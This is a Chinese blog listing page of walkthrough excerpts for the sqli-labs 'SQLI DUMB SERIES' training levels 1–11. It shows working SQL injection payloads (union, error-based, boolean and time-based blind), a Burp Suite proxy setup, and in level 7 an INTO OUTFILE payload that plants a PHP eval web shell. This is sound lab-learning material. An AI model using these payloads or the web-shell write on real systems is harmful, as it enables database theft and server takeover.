SQLI DUMB SERIES闯关
i_momoe
小舟从此逝,江海寄余生
展开
-
SQL注入思路及语法
闭合 联合查询 设行 # 使用-1是为了让值被判断为false 不输出group_concat(); //将列的内容横向输出information_schema //系统数据库information_schema.schemata //系统数据库中存储所有数据库名的表information_schema.tables //系统数据库中存储所有数据库表名的表information_sche...原创 2019-09-23 17:08:00 · 437 阅读 · 0 评论 -
SQLI DUMB SERIES-1
SQLI DUMB SERIES-1思路首先判断要输入的是否为整型(整型不需要构造闭合 可以直接改变逻辑)?id=1 and 1=1/?id=1 and 1=2 查看逻辑对错是否改变回显,判断数据库交互 逻辑错误不返回值 逻辑正确会返回值 真 假?id=-1’构造闭合?id=1’ and 1=1/?id=1’ and 1=2 查看逻辑对错是否改变回显,判断数据库交互 逻辑错误不返回值 逻辑...原创 2019-09-23 15:57:43 · 2608 阅读 · 0 评论 -
SQLI DUMB SERIES-2
SQLI DUMB SERIES-2思路?id=-1 union all select 1,database(),3 from users --+?id=-1 select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’–+ table_name:emails,...原创 2019-09-23 16:00:56 · 857 阅读 · 0 评论 -
SQLI DUMB SERIES-3
?id=1’)构造闭合?id=1’) --+注释后面内容?id=1’) order by 4–+4报错 3不报错 故有3列?id=-1’) union all select 1,2,3 from users–+在将?id=1改为?id=-1使其为逻辑不正确值不显示输出 使得输出位输出后面的语句?id=-1’) union all select 1,2,table_name...原创 2019-09-23 17:05:33 · 1099 阅读 · 0 评论 -
SQLI DUMB SERIES-4
?id=1" 报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’ " 1" ") LIMIT 0,1’ at line 1故")构造闭合后续步骤同 SQLI DUMB ...原创 2019-09-23 17:36:46 · 516 阅读 · 0 评论 -
SQLI DUMB SERIES-5
?id=1'--+构造闭合SQLI DUMB SERIES-5没有回显这里使用报错型?id=-1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=...原创 2019-09-23 20:48:34 · 721 阅读 · 0 评论 -
SQLI DUMB SERIES-6
?id=1"--+构造闭合SQLI DUMB SERIES-6没有回显这里使用报错型?id=-1"AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=...原创 2019-09-23 20:51:14 · 422 阅读 · 0 评论 -
SQLI DUMB SERIES-7
由于没有回显且作者希望我们使用outfile所以我们使用mysql中的select into outfile语句将结果输出到指定的文件中?id=1'))--+构造闭合?id=1')) union all select 1,2,'<?php @eval($_POST["xxx"]);?>' into outfile '/var/www/sql/123.txt' --+...原创 2019-09-23 21:25:28 · 543 阅读 · 0 评论 -
SQLI DUMB SERIES-8
SQLI DUMB SERIES-8思路?id=1'--+构造闭合发现没有回显则我们使用盲注盲注分为几种布尔型盲注Length() //返回字符串长度Substr() //取字符串 用法同下mid() //mid(ABC,1,2)意为从ABC中的第一个字符开始取 取两个字符 则返回值为ABleft() //left(ABC,2)取字符串左边的几位 返回值为AB...原创 2019-09-23 21:56:09 · 768 阅读 · 0 评论 -
SQLI DUMB SERIES-9
此处没有回显所以通过别的函数来检测闭合是否构造sleep() 如果执行 沉睡4秒?id=1' and sleep(4)--+页面延迟输出 所以sleep被执行 所以构造闭合成功猜库名?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+猜表名?id=1' and if ((ascii(su...原创 2019-09-24 09:14:00 · 619 阅读 · 0 评论 -
SQLI DUMB SERIES-10
第十关的步骤与第九关相同可以查看之前的第九关打法SQLI DUMB SERIES-9//猜库名?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+//猜表名?id=1' and if ((ascii(substr((select column_name from information_schema....原创 2019-09-24 09:18:35 · 444 阅读 · 0 评论 -
SQLI DUMB SERIES-11 及 Burp Suite Professional的简易使用方法
11关为POST提交则我们可以借助工具:BurpLoader将浏览器设置代理为127.0.0.1在Burploader中设置代理在其中添加 127.0.0.1:8080 并在前方的Running复选框打上勾在工具中打开拦截此时我们在浏览器中的任何数据都会被拦截在数据报中右键选择Send to Repeater我们再进入Repeater选项卡然后...原创 2019-09-24 11:37:45 · 432 阅读 · 0 评论